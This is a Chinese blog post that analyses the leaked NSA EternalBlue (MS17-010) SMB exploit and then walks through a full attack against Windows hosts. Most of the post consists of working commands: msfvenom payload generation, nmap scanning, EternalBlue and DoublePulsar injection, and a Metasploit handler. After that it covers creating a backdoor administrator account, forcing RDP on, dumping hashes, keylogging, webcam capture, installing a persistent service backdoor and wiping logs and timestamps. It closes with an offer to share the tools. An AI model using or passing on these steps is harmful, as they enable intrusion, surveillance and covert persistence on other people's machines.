黑客是如何入侵的？

美国国家安全局（NSA）的黑客武器库遭泄密曝光，其中有多个远程攻击Windows

系统的武器已在网上公开，任何人都可以使用NSA的武器攻击其他电脑。

NSA武器库的公开被称为是网络世界“核弹危机”，其中有十款影响Windows个人用户的黑客工具，包括永恒之蓝、永恒王者、永恒浪漫、永恒协作、翡翠纤维、古怪地鼠、爱斯基摩卷、文雅学者、日食之翼和尊重审查。这些工具能够远程攻破全球约70%的Windows

系统，无需用户任何操作，只要联网就可以入侵电脑，就像冲击波、震荡波等著名蠕虫一样可以瞬间血洗互联网，木马黑产很可能改造NSA的武器攻击普通网民。

最近席卷全球WannaCry的电脑勒索病毒就是利用其中永恒之蓝进行传播的！

永恒之蓝是NSA网络军火库民用化第一例。它会自动扫描445文件共享端口的Windows

机器，无需用户任何操作，就可以将所有磁盘文件加密、锁死，后缀变为.onion，随后，黑客可以远程控制木马，向用户勒索“赎金”，其原理就是SMB 0day漏洞攻击，大大增强其成功传播的概率！

接下来我分析这款已经泄露处理的美国黑客武器库进行技术分析！

1.NSA Eternalblue（MS17-010） SMB漏洞攻击原理分析

Microsoft 安全公告 MS17-010 - 严重

Microsoft Windows SMB 服务器安全更新 (4013389)

如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息，就可以使用该漏洞远程执行代码。多个Windows SMB远程执行代码漏洞

当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时，存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。

为了利用此漏洞，在多数情况下，未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。

Eternalblue是一个RCE漏洞利用，通过SMB（Server Message Block）和NBT（NetBIOS over TCP/IP）影响Windows XP,Windows 2008 R2和Windows 7系统。

漏洞发生处：C:\Windows\System32\drivers\srv.sys

注：srv.sys是Windows系统驱动文件，是微软默认的信任文件。

漏洞函数：unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2)

触发点：_memmove(v5, (const void *)(a2 + 5 + *(_BYTE *)(a1 + 5)), *(_WORD *)(a1 + 6));

其实该漏洞刚出来的时候基本上可以通杀百分之七十的外网windows

服务器。截止到这会，根据我的内网测试结果，可以通杀百分之九十的Windows内网服务器。由于现在勒索病毒利用该

漏洞疯狂的传播，所以现在很多内外网服务器都已经封堵上！中国部分不思进取或者水平低下网络或服务器管理者思想就是这样，不出问题，不会想到提前防备跟封堵！结果都是得不偿失！

2. 演示模拟攻击过程

自动化攻击，就直接使用《建成自动攻击任务工具》载入NSA美国黑客武器库攻击模块去执行

解压NSA工具包中的windows文件夹到攻机A的C:\目录下（只要不是中文目录皆可）;

01.首先在攻机A安装:

python-2.8.6.msi

pywin32-621.win32-py2.8.exe

02.然后在攻机B生成反弹连接的x86bind.dll

msfvenom -p windows

/meterpreter/bind_tcp LPORT=8888 -f dll > x86bind.dll

03.接着扫描开启445端口的活跃主机并探测操作系统

nmap -Pn -p445 -O 10.10.10.0/24

nmap -Pn -p445 -O -iL ip.txt

04.使用攻机A开始Eternalblue攻击

Python fb.py

use Eternalblue

05.利用Doublepulsar注入dll - use Doublepulsar

06.Kali Linux2.0 攻击机利用msf回连控制主机5555端口

use exploit/multi/handler

set payload windows

/meterpreter/bind_tcp

set LPORT 5555

set RHOST XXX.XXX.XXX.XXX

exploit

3.取Shell后期任性攻击渗透

01.可以添加主账户进管理组获取管理权

net user sherlly sherlly /add

net localgroup Administrators sherlly /add

02,设置端口转发与开启任意端口

如果3389端口只限内网访问，可以使用portfwd将端口转发到本地连接

portfwd add -l 8888 -p 3389 -r XXX.XXX.XXX.XXX

rdesktop -u root -p toor 127.0.0.1:8888

开启远程控制3389端口

wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != “”) call

setallowtsconnections 1

wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName =’RDP-Tcp’) call

setuserauthenticationrequired 1

reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

03.进一步置入meterpreter自带的多功能shell

附带命令如下：

hashdump:获取用户密码哈希值，可以用ophcrack等彩虹表工具进行破解明文

screenshot:开启获取屏幕截图

webcam_snap:开启调取对方摄像头拍照

keyscan_start,keyscan_dump:开启记录键盘动作

ps:展示当前运行进程

sysinfo:展示系统信息

getsystem:系统提权

04.进行持久化控制

migrate:将meterpreter会话移至另一个进程内存空间（migrate pid）配合ps使用

irb:与ruby终端交互，调用meterpreter封装函数，可以添加Railgun组件直接交互本地的Windows API,阻止目标主机进入睡眠状态

irb client.core.use("railgun) client.railgun.kernel32.SetThreadExecutionState("ES_CONTINUOUS|ES_SYSTEM_REQUIRED")

background:隐藏在后台方便msf终端进行其他操作，session查看对话id；session -i X:使用已经成功获取的对话。

05.邪恶植入BackDoor后门

检查是否虚拟机：

run post/windows/gather/checkvm

以系统服务形式安装：在目标主机的31337端口开启监听，使用metsvc.exe安装metsvc-server.exe服务，运行时加载metsrv.dll

run metsvc

getgui开启远程桌面：

run getgui -u sherlly -p sherlly

run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up_XXX.rc

清除入侵痕迹-清除痕迹，关闭服务，删除添加账号

clearev:清除日志

timestomp:修改文件的创建时间，最后写入和最后访问时间

timestomp xiugai.doc -f old.doc

这样就可以来回穿梭，不留痕迹，悄悄的我走了，正如我悄悄的来；我挥一挥衣袖，不带走一片云彩。

PS：需要工具的，请回复评论，后期我会补上工具地址！谢谢